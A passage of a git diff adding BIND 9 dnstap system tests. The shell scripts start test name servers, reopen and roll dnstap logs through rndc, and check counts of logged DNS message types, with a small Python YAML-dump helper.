+# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +. ../conf.sh + +$FEATURETEST --enable-dnstap || { + echo_i "This test requires dnstap support." >&2 + exit 255 +} +exit 0 diff --git a/bin/tests/system/dnstap/setup.sh b/bin/tests/system/dnstap/setup.sh new file mode 100644 index 0000000..252d09e --- /dev/null +++ b/bin/tests/system/dnstap/setup.sh @@ -0,0 +1,22 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +copy_setports ns1/named.conf.in ns1/named.conf +copy_setports ns2/named.conf.in ns2/named.conf +copy_setports ns3/named.conf.in ns3/named.conf +copy_setports ns4/named.conf.in ns4/named.conf + +cp ns2/example.db.in ns2/example.db diff --git a/bin/tests/system/dnstap/tests.sh b/bin/tests/system/dnstap/tests.sh new file mode 100644 index 0000000..5ed8e73 --- /dev/null +++ b/bin/tests/system/dnstap/tests.sh @@ -0,0 +1,834 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +DIGOPTS="+short -p ${PORT}" +RNDCCMD="$RNDC -p ${CONTROLPORT} -c ../common/rndc.conf" + +status=0 + +# dnstap_data_ready <fstrm_capture_PID> <capture_file> <min_file_size> +# Flushes capture_file and checks wheter its size is >= min_file_size. +dnstap_data_ready() { + # Process id of running fstrm_capture. + fstrm_capture_pid=$1 + # Output file provided to fstrm_capture via -w switch. + capture_file=$2 + # Minimum expected file size. + min_size_expected=$3 + + kill -HUP $fstrm_capture_pid + file_size=`wc -c < "$capture_file" | tr -d ' '` + if [ $file_size -lt $min_size_expected ]; then + return 1 + fi +} + + +for bad in bad-*.conf +do + ret=0 + echo_i "checking that named-checkconf detects error in $bad" + $CHECKCONF $bad > /dev/null 2>&1 + if [ $? != 1 ]; then echo_i "failed"; ret=1; fi + status=`expr $status + $ret` +done + +for good in good-*.conf +do + ret=0 + echo_i "checking that named-checkconf detects no error in $good" + $CHECKCONF $good > /dev/null 2>&1 + if [ $? != 0 ]; then echo_i "failed"; ret=1; fi + status=`expr $status + $ret` +done + +echo_i "wait for servers to finish loading" +ret=0 +wait_for_log 20 "all zones loaded" ns1/named.run || ret=1 +wait_for_log 20 "all zones loaded" ns2/named.run || ret=1 +wait_for_log 20 "all zones loaded" ns3/named.run || ret=1 +wait_for_log 20 "all zones loaded" ns4/named.run || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +# both the 'a.example/A' lookup and the './NS' lookup to ns1 +# need tocomplete before reopening/rolling for the counts to +# be correct. + +$DIG $DIGOPTS @10.53.0.3 a.example > dig.out +wait_for_log 20 "(./NS): query_reset" ns1/named.run || true + +# check three different dnstap reopen/roll methods: +# ns1: dnstap-reopen; ns2: dnstap -reopen; ns3: dnstap -roll +mv ns1/dnstap.out ns1/dnstap.out.save +mv ns2/dnstap.out ns2/dnstap.out.save + +if [ -n "$FSTRM_CAPTURE" ] ; then + ret=0 + echo_i "starting fstrm_capture" + $FSTRM_CAPTURE -t protobuf:dnstap.Dnstap -u ns4/dnstap.out \ + -w dnstap.out > fstrm_capture.out.1 2>&1 & + fstrm_capture_pid=$! + wait_for_log 10 "socket path ns4/dnstap.out" fstrm_capture.out.1 || ret=1 + if [ $ret != 0 ]; then echo_i "failed"; fi + status=`expr $status + $ret` +fi + +$RNDCCMD -s 10.53.0.1 dnstap-reopen | sed 's/^/ns1 /' | cat_i +$RNDCCMD -s 10.53.0.2 dnstap -reopen | sed 's/^/ns2 /' | cat_i +$RNDCCMD -s 10.53.0.3 dnstap -roll | sed 's/^/ns3 /' | cat_i +$RNDCCMD -s 10.53.0.4 dnstap -reopen | sed 's/^/ns4 /' | cat_i + +$DIG $DIGOPTS @10.53.0.3 a.example > dig.out + +# send an UPDATE to ns2 +$NSUPDATE <<- EOF +server 10.53.0.2 ${PORT} +zone example +update add b.example 3600 in a 10.10.10.10 +send +EOF + +# XXX: file output should be flushed once a second according +# to the libfstrm source, but it doesn't seem to happen until +# enough data has accumulated. to get all the output, we stop +# the name servers, forcing a flush on shutdown. it would be +# nice to find a better way to do this. +$RNDCCMD -s 10.53.0.1 stop | sed 's/^/ns1 /' | cat_i +$RNDCCMD -s 10.53.0.2 stop | sed 's/^/ns2 /' | cat_i +$RNDCCMD -s 10.53.0.3 stop | sed 's/^/ns3 /' | cat_i + +sleep 1 + +echo_i "checking initial message counts" + +udp1=`$DNSTAPREAD ns1/dnstap.out.save | grep "UDP " | wc -l` +tcp1=`$DNSTAPREAD ns1/dnstap.out.save | grep "TCP " | wc -l` +aq1=`$DNSTAPREAD ns1/dnstap.out.save | grep "AQ " | wc -l` +ar1=`$DNSTAPREAD ns1/dnstap.out.save | grep "AR " | wc -l` +cq1=`$DNSTAPREAD ns1/dnstap.out.save | grep "CQ " | wc -l` +cr1=`$DNSTAPREAD ns1/dnstap.out.save | grep "CR " | wc -l` +rq1=`$DNSTAPREAD ns1/dnstap.out.save | grep "RQ " | wc -l` +rr1=`$DNSTAPREAD ns1/dnstap.out.save | grep "RR " | wc -l` +uq1=`$DNSTAPREAD ns1/dnstap.out.save | grep "UQ " | wc -l` +ur1=`$DNSTAPREAD ns1/dnstap.out.save | grep "UR " | wc -l` + +udp2=`$DNSTAPREAD ns2/dnstap.out.save | grep "UDP " | wc -l` +tcp2=`$DNSTAPREAD ns2/dnstap.out.save | grep "TCP " | wc -l` +aq2=`$DNSTAPREAD ns2/dnstap.out.save | grep "AQ " | wc -l` +ar2=`$DNSTAPREAD ns2/dnstap.out.save | grep "AR " | wc -l` +cq2=`$DNSTAPREAD ns2/dnstap.out.save | grep "CQ " | wc -l` +cr2=`$DNSTAPREAD ns2/dnstap.out.save | grep "CR " | wc -l` +rq2=`$DNSTAPREAD ns2/dnstap.out.save | grep "RQ " | wc -l` +rr2=`$DNSTAPREAD ns2/dnstap.out.save | grep "RR " | wc -l` +uq2=`$DNSTAPREAD ns2/dnstap.out.save | grep "UQ " | wc -l` +ur2=`$DNSTAPREAD ns2/dnstap.out.save | grep "UR " | wc -l` + +mv ns3/dnstap.out.0 ns3/dnstap.out.save +udp3=`$DNSTAPREAD ns3/dnstap.out.save | grep "UDP " | wc -l` +tcp3=`$DNSTAPREAD ns3/dnstap.out.save | grep "TCP " | wc -l` +aq3=`$DNSTAPREAD ns3/dnstap.out.save | grep "AQ " | wc -l` +ar3=`$DNSTAPREAD ns3/dnstap.out.save | grep "AR " | wc -l` +cq3=`$DNSTAPREAD ns3/dnstap.out.save | grep "CQ " | wc -l` +cr3=`$DNSTAPREAD ns3/dnstap.out.save | grep "CR " | wc -l` +rq3=`$DNSTAPREAD ns3/dnstap.out.save | grep "RQ " | wc -l` +rr3=`$DNSTAPREAD ns3/dnstap.out.save | grep "RR " | wc -l` +uq3=`$DNSTAPREAD ns3/dnstap.out.save | grep "UQ " | wc -l` +ur3=`$DNSTAPREAD ns3/dnstap.out.save | grep "UR " | wc -l` + +echo_i "checking UDP message counts" +ret=0 +[ $udp1 -eq 0 ] || { + echo_i "ns1 $udp1 expected 0" + ret=1 +} +[ $udp2 -eq 2 ] || { + echo_i "ns2 $udp2 expected 2" + ret=1 +} +[ $udp3 -eq 4 ] || { + echo_i "ns3 $udp3 expected 4" + ret=1 +} +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking TCP message counts" +ret=0 +[ $tcp1 -eq 6 ] || { + echo_i "ns1 $tcp1 expected 6" + ret=1 +} +[ $tcp2 -eq 2 ] || { + echo_i "ns2 $tcp2 expected 2" + ret=1 +} +[ $tcp3 -eq 6 ] || { + echo_i "ns3 $tcp3 expected 6" + ret=1 +} +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking AUTH_QUERY message counts" +ret=0 +[ $aq1 -eq 3 ] || { + echo_i "ns1 $aq1 exepcted 3" + ret=1 +} +[ $aq2 -eq 2 ] || { + echo_i "ns2 $aq2 expected 2" + ret=1 +} +[ $aq3 -eq 1 ] || { + echo_i "ns3 $aq3 expected 1" + ret=1 +} +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking AUTH_RESPONSE message counts" +ret=0 +[ $ar1 -eq 2 ] || { + echo_i "ns1 $ar1 expected 2" + ret=1 +} +[ $ar2 -eq 1 ] || { + echo_i "ns2 $ar2 expected 1" + ret=1 +} +[ $ar3 -eq 0 ] || { + echo_i "ns3 $ar3 expected 0" + ret=1 +} +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking CLIENT_QUERY message counts" +ret=0 +[ $cq1 -eq 0 ] || { + echo_i "ns1 $cq1 expected 0" + ret=1 +} +[ $cq2 -eq 0 ] || { + echo_i "ns2 $cq2 expected 0" + ret=1 +} +[ $cq3 -eq 1 ] || { + echo_i "ns3 $cq3 expected 1" + ret=1 +} +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking CLIENT_RESPONSE message counts" +ret=0 +[ $cr1 -eq 1 ] || { + echo_i "ns1 $cr1 expected 1" + ret=1 +} +[ $cr2 -eq 1 ] || { + echo_i "ns2 $cr2 expected 1" + ret=1 +} +[ $cr3 -eq 2 ] || { + echo_i "ns3 $cr3 expected 2" + ret=1 +} +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking RESOLVER_QUERY message counts" +ret=0 +[ $rq1 -eq 0 ] || { + echo_i "ns1 $rq1 expected 0" + ret=1 +} +[ $rq2 -eq 0 ] || { + echo_i "ns2 $rq2 expected 0" + ret=1 +} +[ $rq3 -eq 3 ] || { + echo_i "ns3 $rq3 expected 3" + ret=1 +} +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking RESOLVER_RESPONSE message counts" +ret=0 +[ $rr1 -eq 0 ] || { + echo_i "ns1 $rr1 expected 0" + ret=1 +} +[ $rr2 -eq 0 ] || { + echo_i "ns2 $rr2 expected 0" + ret=1 +} +[ $rr3 -eq 3 ] || { + echo_i "ns3 $rr3 expected 3" + ret=1 +} +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking UPDATE_QUERY message counts" +ret=0 +[ $uq1 -eq 0 ] || { + echo_i "ns1 $uq1 expected 0" + ret=1 +} +[ $uq2 -eq 0 ] || { + echo_i "ns2 $uq2 expected 0" + ret=1 +} +[ $uq3 -eq 0 ] || { + echo_i "ns3 $uq3 expected 0" + ret=1 +} +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking UPDATE_RESPONSE message counts" +ret=0 +[ $ur1 -eq 0 ] || { + echo_i "ns1 $ur1 expected 0" + ret=1 +} +[ $ur2 -eq 0 ] || { + echo_i "ns2 $ur2 expected 0" + ret=1 +} +[ $ur3 -eq 0 ] || { + echo_i "ns3 $ur3 expected 0" + ret=1 +} +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking reopened message counts" + +udp1=`$DNSTAPREAD ns1/dnstap.out | grep "UDP " | wc -l` +tcp1=`$DNSTAPREAD ns1/dnstap.out | grep "TCP " | wc -l` +aq1=`$DNSTAPREAD ns1/dnstap.out | grep "AQ " | wc -l` +ar1=`$DNSTAPREAD ns1/dnstap.out | grep "AR " | wc -l` +cq1=`$DNSTAPREAD ns1/dnstap.out | grep "CQ " | wc -l` +cr1=`$DNSTAPREAD ns1/dnstap.out | grep "CR " | wc -l` +rq1=`$DNSTAPREAD ns1/dnstap.out | grep "RQ " | wc -l` +rr1=`$DNSTAPREAD ns1/dnstap.out | grep "RR " | wc -l` +uq1=`$DNSTAPREAD ns1/dnstap.out | grep "UQ " | wc -l` +ur1=`$DNSTAPREAD ns1/dnstap.out | grep "UR " | wc -l` + +udp2=`$DNSTAPREAD ns2/dnstap.out | grep "UDP " | wc -l` +tcp2=`$DNSTAPREAD ns2/dnstap.out | grep "TCP " | wc -l` +aq2=`$DNSTAPREAD ns2/dnstap.out | grep "AQ " | wc -l` +ar2=`$DNSTAPREAD ns2/dnstap.out | grep "AR " | wc -l` +cq2=`$DNSTAPREAD ns2/dnstap.out | grep "CQ " | wc -l` +cr2=`$DNSTAPREAD ns2/dnstap.out | grep "CR " | wc -l` +rq2=`$DNSTAPREAD ns2/dnstap.out | grep "RQ " | wc -l` +rr2=`$DNSTAPREAD ns2/dnstap.out | grep "RR " | wc -l` +uq2=`$DNSTAPREAD ns2/dnstap.out | grep "UQ " | wc -l` +ur2=`$DNSTAPREAD ns2/dnstap.out | grep "UR " | wc -l` + +udp3=`$DNSTAPREAD ns3/dnstap.out | grep "UDP " | wc -l` +tcp3=`$DNSTAPREAD ns3/dnstap.out | grep "TCP " | wc -l` +aq3=`$DNSTAPREAD ns3/dnstap.out | grep "AQ " | wc -l` +ar3=`$DNSTAPREAD ns3/dnstap.out | grep "AR " | wc -l` +cq3=`$DNSTAPREAD ns3/dnstap.out | grep "CQ " | wc -l` +cr3=`$DNSTAPREAD ns3/dnstap.out | grep "CR " | wc -l` +rq3=`$DNSTAPREAD ns3/dnstap.out | grep "RQ " | wc -l` +rr3=`$DNSTAPREAD ns3/dnstap.out | grep "RR " | wc -l` +uq3=`$DNSTAPREAD ns3/dnstap.out | grep "UQ " | wc -l` +ur3=`$DNSTAPREAD ns3/dnstap.out | grep "UR " | wc -l` + +echo_i "checking UDP message counts" +ret=0 +[ $udp1 -eq 0 ] || { + echo_i "ns1 $udp1 expected 0" + ret=1 +} +[ $udp2 -eq 2 ] || { + echo_i "ns2 $udp2 expected 2" + ret=1 +} +[ $udp3 -eq 2 ] || { + echo_i "ns3 $udp3 expected 2" + ret=1 +} +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking TCP message counts" +ret=0 +[ $tcp1 -eq 0 ] || { + echo_i "ns1 $tcp1 expected 0" + ret=1 +} +[ $tcp2 -eq 0 ] || { + echo_i "ns2 $tcp2 expected 0" + ret=1 +} +[ $tcp3 -eq 0 ] || { + echo_i "ns3 $tcp3 expected 0" + ret=1 +} +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking AUTH_QUERY message counts" +ret=0 +[ $aq1 -eq 0 ] || { + echo_i "ns1 $aq1 exepcted 0" + ret=1 +} +[ $aq2 -eq 0 ] || { + echo_i "ns2 $aq2 expected 0" + ret=1 +} +[ $aq3 -eq 0 ] || { + echo_i "ns3 $aq3 expected 0" + ret=1 +} +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking AUTH_RESPONSE message counts" +ret=0 +[ $ar1 -eq 0 ] || { + echo_i "ns1 $ar1 expected 0" + ret=1 +} +[ $ar2 -eq 0 ] || { + echo_i "ns2 $ar2 expected 0" + ret=1 +} +[ $ar3 -eq 0 ] || { + echo_i "ns3 $ar3 expected 0" + ret=1 +} +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking CLIENT_QUERY message counts" +ret=0 +[ $cq1 -eq 0 ] || { + echo_i "ns1 $cq1 expected 0" + ret=1 +} +[ $cq2 -eq 0 ] || { + echo_i "ns2 $cq2 expected 0" + ret=1 +} +[ $cq3 -eq 1 ] || { + echo_i "ns3 $cq3 expected 1" + ret=1 +} +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking CLIENT_RESPONSE message counts" +ret=0 +[ $cr1 -eq 0 ] || { + echo_i "ns1 $cr1 expected 0" + ret=1 +} +[ $cr2 -eq 0 ] || { + echo_i "ns2 $cr2 expected 0" + ret=1 +} +[ $cr3 -eq 1 ] || { + echo_i "ns3 $cr3 expected 1" + ret=1 +} +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking RESOLVER_QUERY message counts" +ret=0 +[ $rq1 -eq 0 ] || { + echo_i "ns1 $rq1 expected 0" + ret=1 +} +[ $rq2 -eq 0 ] || { + echo_i "ns2 $rq2 expected 0" + ret=1 +} +[ $rq3 -eq 0 ] || { + echo_i "ns3 $rq3 expected 0" + ret=1 +} +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking RESOLVER_RESPONSE message counts" +ret=0 +[ $rr1 -eq 0 ] || { + echo_i "ns1 $rr1 expected 0" + ret=1 +} +[ $rr2 -eq 0 ] || { + echo_i "ns2 $rr2 expected 0" + ret=1 +} +[ $rr3 -eq 0 ] || { + echo_i "ns3 $rr3 expected 0" + ret=1 +} +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking UPDATE_QUERY message counts" +ret=0 +[ $uq1 -eq 0 ] || { + echo_i "ns1 $uq1 expected 0" + ret=1 +} +[ $uq2 -eq 1 ] || { + echo_i "ns2 $uq2 expected 1" + ret=1 +} +[ $uq3 -eq 0 ] || { + echo_i "ns3 $uq3 expected 0" + ret=1 +} +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking UPDATE_RESPONSE message counts" +ret=0 +[ $ur1 -eq 0 ] || { + echo_i "ns1 $ur1 expected 0" + ret=1 +} +[ $ur2 -eq 1 ] || { + echo_i "ns2 $ur2 expected 1" + ret=1 +} +[ $ur3 -eq 0 ] || { + echo_i "ns3 $ur3 expected 0" + ret=1 +} +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking whether destination UDP port is logged for client queries" +ret=0 +$DNSTAPREAD ns3/dnstap.out.save | grep -Eq "CQ [0-9:.]+ -> 10.53.0.3:${PORT} UDP" || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +HAS_PYYAML=0 +if [ -n "$PYTHON" ] ; then + $PYTHON -c "import yaml" 2> /dev/null && HAS_PYYAML=1 +fi + +if [ $HAS_PYYAML -ne 0 ] ; then + echo_i "checking dnstap-read YAML output" + ret=0 + { + $PYTHON ydump.py "$DNSTAPREAD" "ns3/dnstap.out.save" > ydump.out || ret=1 + } | cat_i + if [ $ret != 0 ]; then echo_i "failed"; fi + status=`expr $status + $ret` +fi + +echo_i "checking dnstap-read hex output" +ret=0 +hex=`$DNSTAPREAD -x ns3/dnstap.out | tail -1` +echo $hex | $WIRETEST > dnstap.hex +grep 'status: NOERROR' dnstap.hex > /dev/null 2>&1 || ret=1 +grep 'ANSWER: 3, AUTHORITY: 1' dnstap.hex > /dev/null 2>&1 || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +if [ -n "$FSTRM_CAPTURE" ] ; then + $DIG $DIGOPTS @10.53.0.4 a.example > dig.out + + # send an UPDATE to ns4 + $NSUPDATE <<- EOF > nsupdate.out 2>&1 + server 10.53.0.4 ${PORT} + zone example + update add b.example 3600 in a 10.10.10.10 + send +EOF + grep "update failed: NOTAUTH" nsupdate.out > /dev/null || ret=1 + + echo_i "checking unix socket message counts" + sleep 2 + retry_quiet 5 dnstap_data_ready $fstrm_capture_pid dnstap.out 450 || { + echo_i "dnstap output file smaller than expected" + ret=1 + } + if [ $ret != 0 ]; then echo_i "failed"; fi + status=`expr $status + $ret` + kill $fstrm_capture_pid + wait + udp4=`$DNSTAPREAD dnstap.out | grep "UDP " | wc -l` + tcp4=`$DNSTAPREAD dnstap.out | grep "TCP " | wc -l` + aq4=`$DNSTAPREAD dnstap.out | grep "AQ " | wc -l` + ar4=`$DNSTAPREAD dnstap.out | grep "AR " | wc -l` + cq4=`$DNSTAPREAD dnstap.out | grep "CQ " | wc -l` + cr4=`$DNSTAPREAD dnstap.out | grep "CR " | wc -l` + rq4=`$DNSTAPREAD dnstap.out | grep "RQ " | wc -l` + rr4=`$DNSTAPREAD dnstap.out | grep "RR " | wc -l` + uq4=`$DNSTAPREAD dnstap.out | grep "UQ " | wc -l` + ur4=`$DNSTAPREAD dnstap.out | grep "UR " | wc -l` + + echo_i "checking UDP message counts" + ret=0 + [ $udp4 -eq 4 ] || { + echo_i "ns4 $udp4 expected 4" + ret=1 + } + if [ $ret != 0 ]; then echo_i "failed"; fi + status=`expr $status + $ret` + + echo_i "checking TCP message counts" + ret=0 + [ $tcp4 -eq 0 ] || { + echo_i "ns4 $tcp4 expected 0" + ret=1 + } + if [ $ret != 0 ]; then echo_i "failed"; fi + status=`expr $status + $ret` + + echo_i "checking AUTH_QUERY message counts" + ret=0 + [ $aq4 -eq 0 ] || { + echo_i "ns4 $aq4 expected 0" + ret=1 + } + if [ $ret != 0 ]; then echo_i "failed"; fi + status=`expr $status + $ret` + + echo_i "checking AUTH_RESPONSE message counts" + ret=0 + [ $ar4 -eq 0 ] || { + echo_i "ns4 $ar4 expected 0" + ret=1 + } + if [ $ret != 0 ]; then echo_i "failed"; fi + status=`expr $status + $ret` + + echo_i "checking CLIENT_QUERY message counts" + ret=0 + [ $cq4 -eq 1 ] || { + echo_i "ns4 $cq4 expected 1" + ret=1 + } + if [ $ret != 0 ]; then echo_i "failed"; fi + status=`expr $status + $ret` + + echo_i "checking CLIENT_RESPONSE message counts" + ret=0 + [ $cr4 -eq 1 ] || { + echo_i "ns4 $cr4 expected 1" + ret=1 + } + if [ $ret != 0 ]; then echo_i "failed"; fi + status=`expr $status + $ret` + + echo_i "checking RESOLVER_QUERY message counts" + ret=0 + [ $rq4 -eq 0 ] || { + echo_i "ns4 $rq4 expected 0" + ret=1 + } + if [ $ret != 0 ]; then echo_i "failed"; fi + status=`expr $status + $ret` + + echo_i "checking RESOLVER_RESPONSE message counts" + ret=0 + [ $rr4 -eq 0 ] || { + echo_i "ns4 $rr4 expected 0" + ret=1 + } + + echo_i "checking UPDATE_QUERY message counts" + ret=0 + [ $uq4 -eq 1 ] || { + echo_i "ns4 $uq4 expected 1" + ret=1 + } + if [ $ret != 0 ]; then echo_i "failed"; fi + status=`expr $status + $ret` + + echo_i "checking UPDATE_RESPONSE message counts" + ret=0 + [ $ur4 -eq 1 ] || { + echo_i "ns4 $ur4 expected 1" + ret=1 + } + if [ $ret != 0 ]; then echo_i "failed"; fi + status=`expr $status + $ret` + + mv dnstap.out dnstap.out.save + + echo_i "restarting fstrm_capture" + $FSTRM_CAPTURE -t protobuf:dnstap.Dnstap -u ns4/dnstap.out \ + -w dnstap.out > fstrm_capture.out.2 2>&1 & + fstrm_capture_pid=$! + wait_for_log 10 "socket path ns4/dnstap.out" fstrm_capture.out.2 || { + echo_i "failed" + ret=1 + } + $RNDCCMD -s 10.53.0.4 dnstap -reopen | sed 's/^/ns4 /' | cat_i + $DIG $DIGOPTS @10.53.0.4 a.example > dig.out + + echo_i "checking reopened unix socket message counts" + sleep 2 + retry_quiet 5 dnstap_data_ready $fstrm_capture_pid dnstap.out 270 || { + echo_i "dnstap output file smaller than expected" + ret=1 + } + if [ $ret != 0 ]; then echo_i "failed"; fi + status=$((status + ret)) + kill $fstrm_capture_pid + wait + udp4=`$DNSTAPREAD dnstap.out | grep "UDP " | wc -l` + tcp4=`$DNSTAPREAD dnstap.out | grep "TCP " | wc -l` + aq4=`$DNSTAPREAD dnstap.out | grep "AQ " | wc -l` + ar4=`$DNSTAPREAD dnstap.out | grep "AR " | wc -l` + cq4=`$DNSTAPREAD dnstap.out | grep "CQ " | wc -l` + cr4=`$DNSTAPREAD dnstap.out | grep "CR " | wc -l` + rq4=`$DNSTAPREAD dnstap.out | grep "RQ " | wc -l` + rr4=`$DNSTAPREAD dnstap.out | grep "RR " | wc -l` + uq4=`$DNSTAPREAD dnstap.out | grep "UQ " | wc -l` + ur4=`$DNSTAPREAD dnstap.out | grep "UR " | wc -l` + + echo_i "checking UDP message counts" + ret=0 + [ $udp4 -eq 2 ] || { + echo_i "ns4 $udp4 expected 2" + ret=1 + } + if [ $ret != 0 ]; then echo_i "failed"; fi + status=`expr $status + $ret` + + echo_i "checking TCP message counts" + ret=0 + [ $tcp4 -eq 0 ] || { + echo_i "ns4 $tcp4 expected 0" + ret=1 + } + if [ $ret != 0 ]; then echo_i "failed"; fi + status=`expr $status + $ret` + + echo_i "checking AUTH_QUERY message counts" + ret=0 + [ $aq4 -eq 0 ] || { + echo_i "ns4 $aq4 expected 0" + ret=1 + } + if [ $ret != 0 ]; then echo_i "failed"; fi + status=`expr $status + $ret` + + echo_i "checking AUTH_RESPONSE message counts" + ret=0 + [ $ar4 -eq 0 ] || { + echo_i "ns4 $ar4 expected 0" + ret=1 + } + if [ $ret != 0 ]; then echo_i "failed"; fi + status=`expr $status + $ret` + + echo_i "checking CLIENT_QUERY message counts" + ret=0 + [ $cq4 -eq 1 ] || { + echo_i "ns4 $cq4 expected 1" + ret=1 + } + if [ $ret != 0 ]; then echo_i "failed"; fi + status=`expr $status + $ret` + + echo_i "checking CLIENT_RESPONSE message counts" + ret=0 + [ $cr4 -eq 1 ] || { + echo_i "ns4 $cr4 expected 1" + ret=1 + } + if [ $ret != 0 ]; then echo_i "failed"; fi + status=`expr $status + $ret` + + echo_i "checking RESOLVER_QUERY message counts" + ret=0 + [ $rq4 -eq 0 ] || { + echo_i "ns4 $rq4 expected 0" + ret=1 + } + if [ $ret != 0 ]; then echo_i "failed"; fi + status=`expr $status + $ret` + + echo_i "checking RESOLVER_RESPONSE message counts" + ret=0 + [ $rr4 -eq 0 ] || { + echo_i "ns4 $rr4 expected 0" + ret=1 + } + + echo_i "checking UPDATE_QUERY message counts" + ret=0 + [ $uq4 -eq 0 ] || { + echo_i "ns4 $uq4 expected 0" + ret=1 + } + if [ $ret != 0 ]; then echo_i "failed"; fi + status=`expr $status + $ret` + + echo_i "checking UPDATE_RESPONSE message counts" + ret=0 + [ $ur4 -eq 0 ] || { + echo_i "ns4 $ur4 expected 0" + ret=1 + } + if [ $ret != 0 ]; then echo_i "failed"; fi + status=`expr $status + $ret` +fi + +echo_i "checking large packet printing" +ret=0 +# Expect one occurrence of "opcode: QUERY" below "reponse_message_data" and +# another one below "response_message". +lines=`$DNSTAPREAD -y large-answer.fstrm | grep -c "opcode: QUERY"` +[ $lines -eq 2 ] || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +test_dnstap_roll() ( + ip="$1" + ns="$2" + n="$3" + $RNDCCMD -s "${ip}" dnstap -roll "${n}" | sed "s/^/${ns} /" | cat_i && + files=$(find "$ns" -name "dnstap.out.[0-9]" | wc -l) && + test "$files" -le "${n}" && test "$files" -ge "1" +) + +echo_i "checking 'rndc -roll <value>' (no versions)" +ret=0 +start_server --noclean --restart --port "${PORT}" ns3 +_repeat 5 test_dnstap_roll 10.53.0.3 ns3 3 || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +echo_i "checking 'rndc -roll <value>' (versions)" +ret=0 +start_server --noclean --restart --port "${PORT}" ns2 +_repeat 5 test_dnstap_roll 10.53.0.2 ns2 3 || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +echo_i "exit status: $status" +[ "$status" -eq 0 ] || exit 1 diff --git a/bin/tests/system/dnstap/ydump.py b/bin/tests/system/dnstap/ydump.py new file mode 100644 index 0000000..ab7e3c9 --- /dev/null +++ b/bin/tests/system/dnstap/ydump.py @@ -0,0 +1,29 @@ +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +import sys + +try: + import yaml +except (ModuleNotFoundError, ImportError): + print("No python yaml module, skipping") + sys.exit(1) + +import subprocess +import pprint + +DNSTAP_READ = sys.argv[1] +DATAFILE = sys.argv[2] +ARGS = [DNSTAP_READ, "-y", DATAFILE] + +with subprocess.Popen(ARGS, stdout=subprocess.PIPE) as f: + for y in yaml.load_all(f.stdout, Loader=yaml.SafeLoader): + pprint.pprint(y) diff --git a/bin/tests/system/dscp/clean.sh b/bin/tests/system/dscp/clean.sh new file mode 100644 index 0000000..e52f7b6 --- /dev/null +++ b/bin/tests/system/dscp/clean.sh @@ -0,0 +1,20 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +rm -f */root.bk +rm -f dig.out.10.53.0.? +rm -f */named.memstats +rm -f */named.run +rm -f */named.conf +rm -f ns*/named.lock +rm -f 